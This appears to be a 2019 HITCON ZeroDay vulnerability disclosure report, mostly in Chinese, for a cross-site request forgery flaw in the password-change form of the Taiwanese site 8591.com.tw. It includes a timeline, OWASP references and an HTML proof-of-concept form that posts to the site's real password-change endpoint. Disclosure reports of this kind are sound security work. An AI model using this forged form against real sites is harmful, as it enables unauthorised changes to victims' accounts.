8591 CSRF - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2019-00258
  •  發信 Vendor: 數字科技股份有限公司
  • Title: 8591 CSRF
  • Introduction: Cross-Site Request Forgery

處理狀態

目前狀態

公開
Last Update : 2019/05/17
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2019/03/17 10:54:13 : 新提交 (由 Noth 更新此狀態)
  • 2019/03/17 19:57:15 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/03/22 11:15:11 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/03/22 11:15:11 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/03/22 11:15:11 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/05/17 03:00:01 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2019-00258
  • 通報者:Cake7528064 (Noth)
  • 風險:低
  • 類型:跨站冒名請求 (Cross-Site Request Forgery, CSRF)

參考資料

攻擊者可經由該漏洞惡意操控使用者帳號進行惡意行為。

漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://www.8591.com.tw/user-login.html?returnUrl=https%3A%2F%2Fwww.8591.com.tw%2Fuser-editUserInfo.html%3Ftype%3DuserPwdDiv%26tip%3DshowTip%26type_m%3DmemberPassword

敘述

未有_token(令牌)做驗證,導致CSRF。
攻擊者構造表單 Code
PoC :

<html>
<head>
</head>
<body>
<form name="myChoices" method="post" action="https://www.8591.com.tw/user-editUserInfo.html?type_m=memberPassword">
    <ul>
      <li><div class="span_left"><span class="right">會員帳號:</span></div><div class="span_right"><span class="left">zxc752****</span></div></li>
      <li><div class="span_left"><span class="right">新會員密碼:</span></div><div class="span_right"><span class="left"><input class="input_in" name="newpwd" type="password" id="pwd1" size='15' maxlength="20"  /></span><span class="blurMsg" id="newpwdTip"><span class="infomention">&nbsp;&nbsp;密碼長度為6-20字元,字母區分大小寫。</span></span></div></li>
      <li><div class="span_left"><span class="right">再輸一次新密碼:</span></div><div class="span_right"><span class="left"><input class="input_in" name="renewpwd" type="password" id="renewpwd1" size='15' maxlength="20"  /></span><span class="blurMsg"><span class="infomention">&nbsp;&nbsp;請再次填寫要修改的會員密碼。</span></span></div></li>
      <li><div class="span_left"><span class="right">舊會員密碼:</span></div><div class="span_right"><span class="left"><input class="input_in" name="pwd" type="password" id="inputPwd" size='15' maxlength="20"  /></span><span class="blurMsg"></span></div></li>

      <li class="confirmation"><div class="span_left"><span class="right">&nbsp;</span></div>
      <div class="span_right"><span class="left">
      <input  type="submit" id="subButton" name="subButton" value="確認修改" class="subButton">
      <input name="code" type="hidden" id="code" value="">
      <input name="game" type="hidden" id="game" value="0">
      <input name="server" type="hidden" id="server" value="0">
                                                          <input name="module" type="hidden" value="user">
                                                          <input name="action" type="hidden" value="editUserInfo">
                                                          <input type="hidden" id="checkModule" value="editUser" />
                                                          </span></div></li>
    </ul>   
</form>
</body>
</html>

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;